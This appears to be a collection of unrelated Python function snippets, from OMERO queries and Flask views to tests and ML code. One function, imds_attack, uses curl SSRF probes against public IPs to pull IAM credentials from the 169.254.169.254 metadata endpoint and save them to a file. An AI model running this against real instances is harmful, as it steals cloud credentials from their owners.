def filter_by_filename(conn, im_ids, imported_filename): """Filter list of image ids by originalFile name Sometimes we know the filename of an image that has been imported into OMERO but not necessarily the image ID. This is frequently the case when we want to annotate a recently imported image. This funciton will help to filter a list of image IDs to only those associated with a particular filename. Parameters ---------- conn : ``omero.gateway.BlitzGateway`` object OMERO connection. im_ids : list of int List of OMERO image IDs. imported_filename : str The full filename (with extension) of the file whose OMERO image we are looking for. NOT the path of the image. Returns ------- filtered_im_ids : list of int Filtered list of images with originalFile name matching ``imported_filename``. Notes ----- This function should be used as a filter on an image list that has been already narrowed down as much as possible. Note that many different images in OMERO may share the same filename (e.g., image.tif). Examples -------- >>> im_ids = get_image_ids(conn, dataset=303) >>> im_ids = filter_by_filename(conn, im_ids, "feb_2020.tif")] """ q = conn.getQueryService() params = Parameters() params.map = {"oname": rstring(imported_filename)} results = q.projection( "SELECT i.id FROM Image i" " JOIN i.fileset fs" " JOIN fs.usedFiles u" " JOIN u.originalFile o" " WHERE o.name=:oname", params, conn.SERVICE_OPTS ) im_id_matches = [r[0].val for r in results] return list(set(im_ids) & set(im_id_matches))
23,939
def get_count(): """ :return: 计数的值 """ counter = Counters.query.filter(Counters.id == 1).first() return make_succ_response(0) if counter is None else make_succ_response(counter.count)
23,940
def test_search_cuisine_higher_page(client): """Test getting results from a higher page""" page_number = 1 resp = client.open('/search/by_cuisine', query_string={"q": "british", "page": page_number}) assert resp.status_code == server.HTTP_OK assert resp.is_json response_dict = resp.get_json() assert response_dict['page'] == page_number assert len(response_dict['results']) == 0
23,941
def test_crossval_Melanoma(): """ Tests the cross val function that creates the train and test data. """ data = ImportMelanoma() train_X, test_X = split_data(data) full_X = impute(train_X) print(ma.corrcoef(ma.masked_invalid(full_X.flatten()), ma.masked_invalid(test_X.flatten())))
23,942
def test_parse_results(results): """Tests parse_results""" r = parse_results(results) assert isinstance(r, list) for k in ['userEntryCount', 'siteScreenName', 'rank', 'points', 'salaryUsed', '_contestId', 'lineup']: assert k in random.choice(r)
23,943
def save_result(model, img, result, score_thr=0.3, out_file="res.png"): """Save the detection results on the image. Args: model (nn.Module): The loaded detector. img (str or np.ndarray): Image filename or loaded image. result (tuple[list] or list): The detection result, can be either (bbox, segm) or just bbox. score_thr (float): The threshold to visualize the bboxes and masks. out_file (str): Specifies where to save the visualization result """ if hasattr(model, "module"): model = model.module model.show_result( img, result, score_thr=score_thr, show=False, out_file=out_file, bbox_color=(72, 101, 241), text_color=(72, 101, 241), )
23,944
def run(): """Anda creando una matriz números del 0-8 y loego los reorganiza de 3 ern 3""" A = numpy.arange(9).reshape((3, 3)) """Aki va a imprimir la matriz A, que tiene valores del 0 al 8, de 3 en 3""" print(A) """Aquí va a impirmir el resultado de nuestra función""" print(rebenale_primera_ultima_col(A))
23,945
def perm(x, y=None): """Return the number of ways to choose k items from n items without repetition and with order.""" if not isinstance(x, int) or (not isinstance(y, int) and y is not None): raise ValueError(f"Expected integers. Received [{type(x)}] {x} and [{type(y)}] {y}") return math.perm(x, y)
23,946
def check_if_need_update(source, year, states, datadir, clobber, verbose): """ Do we really need to download the requested data? Only case in which we don't have to do anything is when the downloaded file already exists and clobber is False. """ paths = paths_for_year(source=source, year=year, states=states, datadir=datadir) need_update = False message = None for path in paths: if os.path.exists(path): if clobber: message = f'{source} data for {year} already present, CLOBBERING.' need_update = True else: message = f'{source} data for {year} already present, skipping.' else: message = '' need_update = True # if verbose and message is not None: logging.info(message) return need_update
23,947
def main(argv, cfg=None): """Main method""" # Replace stdout and stderr with /dev/tty, so we don't mess up with scripts # that use ssh in case we error out or similar. if cfg is None: cfg = {} try: sys.stdout = open("/dev/tty", "w") sys.stderr = open("/dev/tty", "w") except IOError: pass config = Config(cfg).load() check_exit(argv, config) autodetect_binary(argv, config) # Check that BINARY_SSH is not repassh. # This can happen if the user sets a binary name only (e.g. 'scp') and a # symlink with the same name was set up. # Note that this relies on argv[0] being set sensibly by the caller, # which is not always the case. argv[0] may also just have the binary # name if found in a path. binary_path = os.path.realpath( shutil.which(config.get("BINARY_SSH"))) if argv[0]: ssh_ident_path = os.path.realpath( shutil.which(argv[0])) if binary_path == ssh_ident_path: message = textwrap.dedent("""\ repassh found '{0}' as the next command to run. Based on argv[0] ({1}), it seems like this will create a loop. Please use BINARY_SSH, BINARY_DIR, or change the way repassh is invoked (eg, a different argv[0]) to make it work correctly.""") config.print(message.format(config.get("BINARY_SSH"), argv[0]), loglevel=LOG_ERROR) config.exit(255) parse_command_line(argv, config) identity = find_identity(argv, config) keys = find_keys(identity, config) sshconfig = find_ssh_config(identity, config) agent = AgentManager(identity, sshconfig, config) if not config.get("SSH_BATCH_MODE"): # do not load keys in BatchMode agent.load_unloaded_keys(keys) portknock(argv, config) return agent.run_ssh( argv[1:], cfg.get("stdin", None), cfg.get("stdout", None), cfg.get("stderr", None) )
23,948
def dbenv(): """ Loads the dbenv for a specific region of code, does not unload afterwards Only use when it makes it possible to avoid loading the dbenv for certain code paths Good Example:: # do this @click.command() @click.option('--with-db', is_flag=True) def profile_info(with_db): # read the config file click.echo(profile_config) # load the db only if necessary if with_db: with dbenv(): # gather db statistics for the profile click.echo(db_statistics) This will run very fast without the --with-db flag and slow only if database info is requested Do not use if you will end up loading the dbenv anyway Bad Example:: # don't do this def my_function(): with dbenv(): # read from db # do db unrelated stuff """ load_dbenv_if_not_loaded() yield
23,949
def ui(candles: np.ndarray, period: int = 14, scalar: float = 100, source_type: str = "close", sequential: bool = False) -> Union[float, np.ndarray]: """ Ulcer Index (UI) :param candles: np.ndarray :param period: int - default: 14 :param scalar: float - default: 100 :param source_type: str - default: "close" :param sequential: bool - default: False :return: float | np.ndarray """ candles = slice_candles(candles, sequential) source = get_candle_source(candles, source_type=source_type) highest_close = talib.MAX(source, period) downside = scalar * (source - highest_close) downside /= highest_close d2 = downside * downside res = np.sqrt(talib.SUM(d2, period) / period) return res if sequential else res[-1]
23,950
def test_bilayer_imported(): """ Sample test, will always pass so long as import statement worked. """ assert "bilayer" in sys.modules
23,951
def _padwithzeros(vector, pad_width, iaxis, kwargs): """Pad with zeros""" vector[: pad_width[0]] = 0 vector[-pad_width[1] :] = 0 return vector
23,952
def fill_from_sparse_coo(t,elems): """ :param elems: non-zero elements defined in COO format (tuple(indices),value) :type elems: list[tuple(tuple(int),value)] """ for e in elems: t[e[0]]=e[1] return t
23,953
def download_responses(survey_id): """Download survey responses.""" if request.method == 'GET': csv = survey_service.download_responses(survey_id) return Response( csv, mimetype='text/csv', headers={'Content-disposition': 'attachment; filename=surveydata.csv'})
23,954
def array_shift(data: Iterable, shift: int) -> Deque: """ left(-) or right(+) shift of array >>> arr = range(10) >>> array_shift(arr, -3) deque([3, 4, 5, 6, 7, 8, 9, 0, 1, 2]) >>> array_shift(arr, 3) deque([7, 8, 9, 0, 1, 2, 3, 4, 5, 6]) """ from collections import deque deq = deque(data) deq.rotate(shift) return deq
23,955
def convert_to_timetable(trains): """ 列車データを時刻表データに変換する関数 Args: trains (list of list of `Section`): 列車データ Returns: timetable (list): 時刻表データ timetable[from_station][to_station][dep_time] = (from_time, to_time) -> 現在時刻が dep_time の時に from_station から to_station まで直近の列車で移動する場合の 乗車・下車時刻(0時からの経過分)のタプル """ max_time = 1 + max([section.to_time for train in trains for section in train]) n_stations = len(set([section.to_station for train in trains for section in train])) timetable = [[[(max_time, max_time) for _ in range(max_time)] for _ in range(n_stations)] for _ in range(n_stations)] # Step0: 次ステップの探索用に (時刻, 駅) についてのグラフ(adj)を作成 adj = defaultdict(list) target_time_flag = [0 for _ in range(max_time)] for train in trains: for section in train: adj[(section.from_time, section.from_station)].append((section.to_time, section.to_station)) target_time_flag[section.from_time] = 1 target_time_flag[section.to_time] = 1 target_times = [t for t in range(max_time) if target_time_flag[t] == 1] for station in range(n_stations): for from_time, to_time in zip(target_times[:-1], target_times[1:]): adj[(from_time, station)].append((to_time, station)) # Step1: 出発時刻 = 乗車時刻 のデータを登録 for train in trains: for section in train: # 他の駅への最速到着時刻をBFSで求める min_to_time = [max_time for _ in range(n_stations)] min_to_time[section.from_station] = section.from_time que = deque([(section.from_time, section.from_station)]) visited = defaultdict(int) visited[(section.from_time, section.from_station)] = 1 while len(que) > 0: from_time, from_station = que.popleft() for to_time, to_station in adj[(from_time, from_station)]: if visited[(to_time, to_station)] == 1: continue min_to_time[to_station] = min(to_time, min_to_time[to_station]) que.append((to_time, to_station)) visited[(to_time, to_station)] = 1 # 出発時刻 = 乗車時刻 のデータを登録 for to_station in range(n_stations): if to_station == section.from_station: continue to_time = min_to_time[to_station] if to_time == max_time: continue timetable[section.from_station][to_station][section.from_time] = (section.from_time, to_time) # Step2: 出発時刻 != 乗車時刻 のデータを登録 # 例えば駅1→2の始発列車を考え、5:00(300)発・5:05(305)着だとする。 # step1では timetable[1][2][300] = (300, 305) とデータが登録される。 # ここで駅1を5:00(300)より前に出発するとしても、駅1で待機して同じ列車に乗ることになるため、 # t < 300 に対して timetable[1][2][t] = (300, 305) となるはず。 # step1ではこのデータは入らないので、ここで入れる。 for t in range(max_time - 2, - 1, - 1): for from_station in range(n_stations): for to_station in range(n_stations): timetable[from_station][to_station][t] = \ min(timetable[from_station][to_station][t], timetable[from_station][to_station][t + 1]) return timetable
23,956
def parents(level, idx): """ Return all the (grand-)parents of the Healpix pixel idx at level (in nested format) :param level: Resolution level :param idx: Pixel index :return: All the parents of the pixel """ assert idx < 12 * 2 ** (2 * level) plpairs = [] for ind in range(level, 0, -1): idx = int(math.floor(idx / 4)) plpairs.append(tuple((ind - 1, idx))) level -= 1 return plpairs[::-1]
23,957
def precise_inst_ht(vert_list, spacing, offset): """ Uses a set of Vertical Angle Observations taken to a levelling staff at regular intervals to determine the height of the instrument above a reference mark :param vert_list: List of Vertical (Zenith) Angle Observations (minimum of 3) in Decimal Degrees format :param spacing: Distance in metres between each vertical angle observation :param offset: Lowest observed height above reference mark :return: Instrument Height above reference mark and its standard deviation """ if len(vert_list) < 3: raise ValueError('ValueError: 3 or more vertical angles required') vert_list.sort(reverse=True) vert_pairs = [(va1, va2) for va1, va2 in zip(vert_list, vert_list[1:])] base_ht = [] height_comp = [] for num, pair in enumerate(vert_pairs): base_ht_pair = offset + num * spacing base_ht.append(base_ht_pair) dist_a = sin(radians(pair[1])) * (spacing / (sin(radians(pair[0] - pair[1])))) delta_ht = dist_a * (sin(radians(pair[0] - 90))) height_comp.append(delta_ht + base_ht[num]) return round(mean(height_comp), 5), round(stdev(height_comp), 5)
23,958
def plot_trades(strategy, benchmark=None): """ Plot Trades: benchmark is the equity curve that the trades get plotted on. If not provided, strategy equity curve is used. Both arguements are daily balance. """ if benchmark is None or strategy is benchmark: benchmark = strategy label = 'strategy' else: label = 'benchmark' fig = plt.figure() axes = fig.add_subplot(111, ylabel='Portfolio value in $') axes.plot(benchmark.index, benchmark['close'], label=label) # buy trades s = strategy['state'] == pf.TradeState.OPEN s = s.reindex_like(benchmark) buy = benchmark[s] axes.plot(buy.index, buy['close'], '^', markersize=10, color='k') # sell trades s = strategy['state'] == pf.TradeState.CLOSE s = s.reindex_like(benchmark) sell = benchmark[s] axes.plot(sell.index, sell['close'], 'v', markersize=10, color='r') plt.legend(loc='best')
23,959
def _parse_transform_set(transform_dict, imputer_string, n_images=None): """Parse a dictionary read from yaml into a TransformSet object Parameters ---------- transform_dict : dictionary The dictionary as read from the yaml config file containing config key-value pairs imputer_string : string The name of the imputer (could be None) n_images : int > 0 The number of images being read in. Required because we need to create a new image transform for each image Returns ------- image_transforms : list A list of image Transform objects imputer : Imputer An Imputer object global_transforms : list A list of global Transform objects """ image_transforms = [] global_transforms = [] if imputer_string in _imputers: imputer = _imputers[imputer_string]() else: imputer = None if transform_dict is not None: for t in transform_dict: if type(t) is str: t = {t: {}} key, params = list(t.items())[0] if key in _image_transforms: image_transforms.append([_image_transforms[key](**params) for k in range(n_images)]) elif key in _global_transforms: global_transforms.append(_global_transforms[key](**params)) return image_transforms, imputer, global_transforms
23,960
def query_fields_of_study(subscription_key, ids=None, levels=None, fields=['Id', 'DFN', 'FL', 'FP.FId', 'FC.FId'], # id, display_name, level, parent_ids, children_ids query_count=1000, results_limit=None): """Queries the MAG for fields of study. Expect >650k results for all levels. Args: subscription_key (str): MAG api subscription key ids: (:obj:`list` of `int`): field of study ids to query levels (:obj:`list` of `int`): levels to extract. 0 is highest, 5 is lowest fields (:obj:`list` of `str`): codes of fields to return, as per mag documentation query_count (int): number of items to return from each query results_limit (int): break and return as close to this number of results as the offset and query_count allow (for testing) Returns: (:obj:`list` of `dict`): processed results from the api query """ if ids is not None and levels is None: expr_args = (ids, 'Id') elif levels is not None and ids is None: expr_args = (levels, 'FL') else: raise TypeError("Field of study ids OR levels should be supplied") field_mapping = {'Id': 'id', 'DFN': 'name', 'FL': 'level', 'FP': 'parent_ids', 'FC': 'child_ids'} fields_to_drop = ['logprob', 'prob'] fields_to_compact = ['parent_ids', 'child_ids'] for expr in build_expr(*expr_args): logging.info(expr) count = 1000 offset = 0 while True: fos_data = query_mag_api(expr, fields, subscription_key=subscription_key, query_count=count, offset=offset) if fos_data['entities'] == []: logging.info("Empty entities returned, no more data") break # clean up and formatting for row in fos_data['entities']: for f in fields_to_drop: del row[f] for code, description in field_mapping.items(): try: row[description] = row.pop(code) except KeyError: pass for field in fields_to_compact: try: row[field] = ','.join(str(ids['FId']) for ids in row[field]) except KeyError: # no parents and/or children pass logging.info(f'new fos: {row}') yield row offset += len(fos_data['entities']) logging.info(offset) if results_limit is not None and offset >= results_limit: break
23,961
def send_pair(pin: int, b: bool) -> None: """Data is encoded as two bits when transmitted: value 0 = transmitted 01 value 1 = transmitted 10 """ send_bit(pin, b) send_bit(pin, not b)
23,962
def initialize_train_test_dataset(dataset): """ Create train and test dataset by random sampling. pct: percentage of training """ pct = 0.80 if dataset in ['reddit', 'gab']: dataset_fname = './data/A-Benchmark-Dataset-for-Learning-to-Intervene-in-Online-Hate-Speech-master/' + dataset + '.csv' xlist, ylist, zlist = read_EMNLP2019(dataset_fname) hate_num = 0 for y in ylist: for i in y.strip('[]').split(', '): hate_num += 1 X_text, Y_text = [], [] line_num = 0 for x, y, z in zip(xlist, ylist, zlist): x = x.strip().split('\n') for i in y.strip('[]').split(', '): X_text.append('. '.join(x[int(i) - 1].split('. ')[1:]).strip('\t')) # Only the hate speech line. temp = [] for j in split_response_func(z): if j.lower() == 'n/a': continue temp.append(j) Y_text.append(temp) line_num += 1 elif dataset == 'conan': all_text = [json.loads(line) for line in open('./data/CONAN/CONAN.json', 'r')] EN_text = [x for x in all_text[0]['conan'] if x['cn_id'][:2] == 'EN'] X_text = [x['hateSpeech'].strip() for x in EN_text] Y_text = [[x['counterSpeech'].strip()] for x in EN_text] hate_num = len(X_text) random_index = [x for x in range(hate_num)] random.shuffle(random_index) train_index = sorted(random_index[:int(pct*len(random_index))]) train_x_text = [X_text[i] for i in range(hate_num) if i in train_index] train_y_text = [Y_text[i] for i in range(hate_num) if i in train_index] test_x_text = [X_text[i] for i in range(hate_num) if i not in train_index] test_y_text = [Y_text[i] for i in range(hate_num) if i not in train_index] return train_x_text, train_y_text, test_x_text, test_y_text
23,963
def load_raw_data_xlsx(files): """ Load data from an xlsx file After loading, the date column in the raw data is converted to a UTC datetime Parameters ---------- files : list A list of files to read. See the Notes section for more information Returns ------- list A list containing a DataFrame for each file that was read Notes ----- - Files is an array of maps containing the following data with the keyword (keyword) + ('file_name') the name of the xlsx file + ('date_column') the name of the date_column in the raw_data + ('time_zone') specifier for the timezone the raw data is recorded in + ('sheet_name') name or list of names of the sheets that are to be read + ('combine') boolean, all datasheets with true are combined into one, all others are read individually + ('start_column') Columns between this and ('end_column') are loaded + ('end_column') """ print('Importing XLSX Data...') combined_files = [] individual_files = [] for xlsx_file in files: print('importing ' + xlsx_file['file_name']) # if isinstance(file_name, str): # file_name = [file_name,'UTC'] date_column = xlsx_file['date_column'] raw_data = pd.read_excel(INPATH + xlsx_file['file_name'], xlsx_file['sheet_name'], parse_dates=[date_column]) # convert load data to UTC if(xlsx_file['time_zone'] != 'UTC'): raw_data[date_column] = pd.to_datetime(raw_data[date_column]).dt.tz_localize(xlsx_file['time_zone'], ambiguous="infer").dt.tz_convert('UTC').dt.strftime('%Y-%m-%d %H:%M:%S') else: if (xlsx_file['dayfirst']): raw_data[date_column] = pd.to_datetime(raw_data[date_column], format='%d-%m-%Y %H:%M:%S').dt.tz_localize(None) else: raw_data[date_column] = pd.to_datetime(raw_data[date_column], format='%Y-%m-%d %H:%M:%S').dt.tz_localize(None) if(xlsx_file['data_abs']): raw_data.loc[:, xlsx_file['start_column']:xlsx_file['end_column']] = raw_data.loc[:, xlsx_file['start_column']:xlsx_file['end_column']].abs() # rename column IDs, specifically Time, this will be used later as the df index raw_data.rename(columns={date_column: 'Time'}, inplace=True) raw_data.head() # now the data is positive and set to UTC raw_data.info() # interpolating for missing entries created by asfreq and original missing values if any raw_data.interpolate(method='time', inplace=True) if(xlsx_file['combine']): combined_files.append(raw_data) else: individual_files.append(raw_data) if(len(combined_files) > 0): individual_files.append(pd.concat(combined_files)) return individual_files
23,964
def record_result(board): """Add a chess game result to the database.""" completion_date = datetime.now().strftime(DATE_FORMAT) is_draw = 1 if board.result() == '1/2-1/2' else 0 n_moves = board.fullmove_number if board.turn: # White's turn. # board.fullmove_number is incremented after every black turn. n_moves -= 1 winner = 'white' if board.result() == '1-0' else 'black' if is_draw: winner = None pgn = configure_pgn(board) insert_chess_game(completion_date, is_draw, n_moves, winner, pgn)
23,965
def filter_production_hosts(nr): """ Filter the hosts inventory, which match the production attribute. :param nr: An initialised Nornir inventory, used for processing. :return target_hosts: The targeted nornir hosts after being processed through nornir filtering. """ # Execute filter based on hosts being in production target_hosts = nr.filter(F(production__eq=True)) # Print seperator and header print("=" * 50) print("The hosts running in Production are:") # Iterate over filtered results and printout information for host, data in target_hosts.inventory.hosts.items(): print( f"Host: {Fore.CYAN}{host} " + Fore.RESET + f"- Platform: {Fore.CYAN}{data.platform} " + Fore.RESET + f"- OS Version: {Fore.CYAN}{data['os_version']} " + Fore.RESET + f"- Production?: {Fore.CYAN}{data['production']}" ) # Print total and seperator print(f"Total: {len(target_hosts.inventory.hosts.items())}") print("=" * 50) # Return filtered hosts return target_hosts
23,966
def get_lightmap(map_name="random"): """ Fetches the right lightmap given command line argument. """ assert map_name in ["default", "random"] + list(CONSTANTS.ALL_LIGHTMAPS.keys()), f"Unknown lightmap {map_name}..." if map_name == "random": map_name = random.choice(list(CONSTANTS.ALL_LIGHTMAPS.keys())) elif map_name == "default": map_name = "Subway_Lights" lightmap = sl.LightMap(CONSTANTS.ALL_LIGHTMAPS[map_name]) return lightmap
23,967
def kill_instance(cook_url, instance, assert_response=True, expected_status_code=204): """Kill an instance""" params = {'instance': [instance]} response = session.delete(f'{cook_url}/rawscheduler', params=params) if assert_response: assert expected_status_code == response.status_code, response.text return response
23,968
def _get_n_batch_from_dataloader(dataloader: DataLoader) -> int: """Get a batch number in dataloader. Args: dataloader: torch dataloader Returns: A batch number in dataloader """ n_data = _get_n_data_from_dataloader(dataloader) n_batch = dataloader.batch_size if dataloader.batch_size else 1 return n_data // n_batch
23,969
def test_get_pipeline_id(mock_get_properties, mock_get_details, mock_boto3): """Tests getting the pipeline ID from boto3""" test_pipelines = [{ 'pipelineIdList': [{ "name": "Test Pipeline", "id": "1234" }, { "name": "Other", "id": "5678" }], "hasMoreResults": False }] generated = {"project": "test"} properties = copy.deepcopy(TEST_PROPERTIES) mock_get_details.return_value.data = generated mock_get_properties.return_value = properties mock_boto3.return_value.get_paginator.return_value.paginate.return_value = test_pipelines dp = AWSDataPipeline(app='test_app', env='test_env', region='us-east-1', prop_path='other') dp.get_pipeline_id() assert dp.pipeline_id == '1234'
23,970
def get_hidden() -> list: """ Returns places that should NOT be shown in the addressbook """ return __hidden_places__
23,971
def test_draft_patch_cancel_with_invalid_states(client, jwt, app): """ TODO: This isn't working finish it! Setup: Test: :param client: :param jwt: :param app: :return: """ # Define our data input_fields = build_test_input_fields() custom_names = [{ 'name': 'BLUE HERON TOURS LTD.', 'choice': 1, 'designation': 'LTD.', 'name_type_cd': 'CO', 'consent_words': '', 'conflict1': 'BLUE HERON TOURS LTD.', 'conflict1_num': '0515211', # Custom name has a corp num to make it 'consumed' 'corpNum': '12345' }] input_fields['names'] = custom_names test_nr = create_approved_nr(client, input_fields) assert test_nr is not None # Take the response and edit it # Expect this to fail as we nr_data = {} patch_response = patch_nr(client, NameRequestActions.CANCEL.value, test_nr.get('id'), nr_data) # Ensure the request failed print('Assert that the request failed: ' + str(bool(patch_response.status_code == 500))) patched_nr = json.loads(patch_response.data) assert patched_nr is not None # There should be an error message in the response print('PATCH Response: \n' + json.dumps(patched_nr, sort_keys=True, indent=4, separators=(',', ': ')) + '\n') assert isinstance(patched_nr.get('message'), str)
23,972
def wait_for_unit_state(reactor, docker_client, unit_name, expected_activation_states): """ Wait until a unit is in the requested state. :param IReactorTime reactor: The reactor implementation to use to delay. :param docker_client: A ``DockerClient`` instance. :param unicode unit_name: The name of the unit. :param expected_activation_states: Activation states to wait for. :return: ``Deferred`` that fires when required state has been reached. """ def is_in_states(units): for unit in units: if unit.name == unit_name: if unit.activation_state in expected_activation_states: return True def check_if_in_states(): responded = docker_client.list() responded.addCallback(is_in_states) return responded return loop_until(reactor, check_if_in_states)
23,973
def get_list_primitives(): """Get list of primitive words.""" return g_primitives
23,974
def make_graph(edge_list, threshold=0.0, max_connections=10): """Return 2 way graph from edge_list based on threshold""" graph = defaultdict(list) edge_list.sort(reverse=True, key=lambda x: x[1]) for nodes, weight in edge_list: a, b = nodes if weight > threshold: if len(graph[a]) < max_connections: graph[a].append(gv.connection(b, weight)) if len(graph[b]) < max_connections: graph[b].append(gv.connection(a, weight)) print(f'Total graph nodes considered : {len(graph.keys())}') print(f'Total graph connections considered : {sum(map(len, graph.values()))}') return graph
23,975
def imds_attack(): """Function to run attack on instances running IMDSv1""" os.system("touch credentials.txt") for ip in public_ip_list: logging.info("Performing SSRF Probe of {ip}".format(ip=ip)) logging.info("") os.system("curl http://{ip}/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ >> credentials.txt".format(ip=ip)) os.system("echo ' ' >> credentials.txt") logging.info("If any credentials are found, they'll be listed below here:") os.system("cat credentials.txt")
23,976
def ping(request): """Ping view.""" checked = {} for service in services_to_check: checked[service.name] = service().check() if all(item[0] for item in checked.values()): return HttpResponse( PINGDOM_TEMPLATE.format(status='OK'), content_type='text/xml', ) else: body = PINGDOM_TEMPLATE.format(status='FALSE') for service_result in filter(lambda x: x[0] is False, checked.values()): body += COMMENT_TEMPLATE.format(comment=service_result[1]) return HttpResponse( body, status=status.HTTP_500_INTERNAL_SERVER_ERROR, content_type='text/xml', )
23,977
def _num_samples(x): """Return number of samples in array-like x.""" message = 'Expected sequence or array-like, got %s' % type(x) if hasattr(x, 'fit') and callable(x.fit): # Don't get num_samples from an ensembles length! raise TypeError(message) if not hasattr(x, '__len__') and not hasattr(x, 'shape'): if hasattr(x, '__array__'): x = np.asarray(x) else: raise TypeError(message) if hasattr(x, 'shape') and x.shape is not None: if len(x.shape) == 0: raise TypeError("Singleton array %r cannot be considered" " a valid collection." % x) # Check that shape is returning an integer or default to len # Dask dataframes may not return numeric shape[0] value if isinstance(x.shape[0], numbers.Integral): return x.shape[0]
23,978
def inf_compress_idb(*args): """ inf_compress_idb() -> bool """ return _ida_ida.inf_compress_idb(*args)
23,979
def tokens_history(corpus_id): """ History of changes in the corpus :param corpus_id: ID of the corpus """ corpus = Corpus.query.get_or_404(corpus_id) tokens = corpus.get_history(page=int_or(request.args.get("page"), 1), limit=int_or(request.args.get("limit"), 20)) return render_template_with_nav_info('main/tokens_history.html', corpus=corpus, tokens=tokens)
23,980
def find_pattern_clumps( text: str, substring_length: int, window_length: int, minimum_frequency: int ): """TODO: [summary] Returns: [type]: [description] """ patterns = set() for index in range(len(text) - window_length + 1): window = text[index : index + window_length] freq_map = get_frequency_map(text=window, substring_length=substring_length) for key, value in freq_map.items(): if value >= minimum_frequency: patterns.add(key) return patterns
23,981
def Hidden(request): """ Hidden Field with a visible friend.. """ schema = schemaish.Structure() schema.add('Visible', schemaish.String()) schema.add('Hidden', schemaish.String()) form = formish.Form(schema, 'form') form['Hidden'].widget = formish.Hidden() return form
23,982
def train_and_eval(trial: optuna.Trial, study_dir: str, seed: int): """ Objective function for the Optuna `Study` to maximize. .. note:: Optuna expects only the `trial` argument, thus we use `functools.partial` to sneak in custom arguments. :param trial: Optuna Trial object for hyper-parameter optimization :param study_dir: the parent directory for all trials in this study :param seed: seed value for the random number generators, pass `None` for no seeding :return: objective function value """ # Synchronize seeds between Optuna trials pyrado.set_seed(seed) # Load the data data_set_name = "oscillation_50Hz_initpos-0.5" data = pd.read_csv(osp.join(pyrado.PERMA_DIR, "time_series", f"{data_set_name}.csv")) if data_set_name == "daily_min_temperatures": data = to.tensor(data["Temp"].values, dtype=to.get_default_dtype()).view(-1, 1) elif data_set_name == "monthly_sunspots": data = to.tensor(data["Sunspots"].values, dtype=to.get_default_dtype()).view(-1, 1) elif "oscillation" in data_set_name: data = to.tensor(data["Positions"].values, dtype=to.get_default_dtype()).view(-1, 1) else: raise pyrado.ValueErr( given=data_set_name, eq_constraint="'daily_min_temperatures', 'monthly_sunspots', " "'oscillation_50Hz_initpos-0.5', or 'oscillation_100Hz_initpos-0.4", ) # Dataset data_set_hparam = dict( name=data_set_name, ratio_train=0.7, window_size=trial.suggest_int("dataset_window_size", 1, 100), standardize_data=False, scale_min_max_data=True, ) dataset = TimeSeriesDataSet(data, **data_set_hparam) # Policy policy_hparam = dict( dt=0.02 if "oscillation" in data_set_name else 1.0, hidden_size=trial.suggest_int("policy_hidden_size", 2, 51), obs_layer=None, activation_nonlin=fcn_from_str( trial.suggest_categorical("policy_activation_nonlin", ["to_tanh", "to_sigmoid"]) ), mirrored_conv_weights=trial.suggest_categorical("policy_mirrored_conv_weights", [True, False]), conv_out_channels=1, conv_kernel_size=None, conv_padding_mode=trial.suggest_categorical("policy_conv_padding_mode", ["zeros", "circular"]), tau_init=trial.suggest_loguniform("policy_tau_init", 1e-2, 1e3), tau_learnable=True, kappa_init=trial.suggest_categorical("policy_kappa_init", [0, 1e-4, 1e-2]), kappa_learnable=True, potential_init_learnable=trial.suggest_categorical("policy_potential_init_learnable", [True, False]), init_param_kwargs=trial.suggest_categorical("policy_init_param_kwargs", [None, dict(bell=True)]), use_cuda=False, ) policy = NFPolicy(spec=EnvSpec(act_space=InfBoxSpace(shape=1), obs_space=InfBoxSpace(shape=1)), **policy_hparam) # Algorithm algo_hparam = dict( windowed=trial.suggest_categorical("algo_windowed", [True, False]), max_iter=1000, optim_class=optim.Adam, optim_hparam=dict( lr=trial.suggest_uniform("optim_lr", 5e-4, 5e-2), eps=trial.suggest_uniform("optim_eps", 1e-8, 1e-5), weight_decay=trial.suggest_uniform("optim_weight_decay", 5e-5, 5e-3), ), loss_fcn=nn.MSELoss(), ) csv_logger = create_csv_step_logger(osp.join(study_dir, f"trial_{trial.number}")) algo = TSPred(study_dir, dataset, policy, **algo_hparam, logger=csv_logger) # Train without saving the results algo.train(snapshot_mode="latest", seed=seed) # Evaluate num_init_samples = dataset.window_size _, loss_trn = TSPred.evaluate( policy, dataset.data_trn_inp, dataset.data_trn_targ, windowed=algo.windowed, num_init_samples=num_init_samples, cascaded=False, ) _, loss_tst = TSPred.evaluate( policy, dataset.data_tst_inp, dataset.data_tst_targ, windowed=algo.windowed, num_init_samples=num_init_samples, cascaded=False, ) return loss_trn
23,983
def my_function(my_arg, my_other_arg): """A function just for me. """ pass
23,984
def random_active_qubits(nqubits, nmin=None, nactive=None): """Generates random list of target and control qubits.""" all_qubits = np.arange(nqubits) np.random.shuffle(all_qubits) if nactive is None: nactive = np.random.randint(nmin + 1, nqubits) return list(all_qubits[:nactive])
23,985
def main(host: str, username: str, password: str): """メイン. Args: host: ホスト名又はIPアドレス username: ユーザ名 password: パスワード """ url: str = f"http://{host}/" rlogintoken: re.Pattern = re.compile(r"creatHiddenInput\(\"Frm_Logintoken\", *\"(\d+)\"\)") rloginchecktoken: re.Pattern = re.compile(r"creatHiddenInput\(\"Frm_Loginchecktoken\", *\"(\d+)\"\)") s: requests.Session = requests.Session() res: requests.Response = s.get(url) m: typ.Optional[re.Match] = rlogintoken.search(res.text) if m is None: print("error 1") return 1 logintoken: str = m[1] m = rloginchecktoken.search(res.text) if m is None: print("error 2") return 2 loginchecktoken: str = m[1] pwd_random: int = round(random.random() * 89999999) + 10000000 before_password = hashlib.md5(f"{password}{pwd_random}".encode("utf-8")).hexdigest() params: typ.Dict[str, str] = {} params["action"] = "login" params["Username"] = username params["Password"] = before_password params["Frm_Logintoken"] = logintoken params["UserRandomNum"] = str(pwd_random) params["Frm_Loginchecktoken"] = loginchecktoken res2: requests.Response = s.post(url, data=params, allow_redirects=False) if res2.status_code != 302: print("error 3") return 3 res3: requests.Response = s.get(f"{url}getpage.gch?pid=1002&nextpage=pon_status_lan_link_info_t.gch") if res3.status_code != 200: print("error 4") return 4 columns: typ.List[str] = [ "ポート名", "受信したデータ量(byte)", "受信したパケットの総数", "マルチキャストパケットの受信数", "ブロードキャストパケットの受信数", "送信したデータ量(byte)", "送信されたパケットの総数", "マルチキャストパケットの送信数", "ブロードキャストパケットの送信数", ] indexdic: typ.Dict[str, int] = {} for i, c in enumerate(columns): indexdic[c] = i print(", ".join(columns)) soup = BeautifulSoup(res3.text, "html.parser") index: int = -1 values: typ.List = [] for td in soup.find_all("td"): if index != -1: values[index] = td.text.strip() index = -1 else: index = indexdic.get(td.text.strip(), -1) if index == 0: if 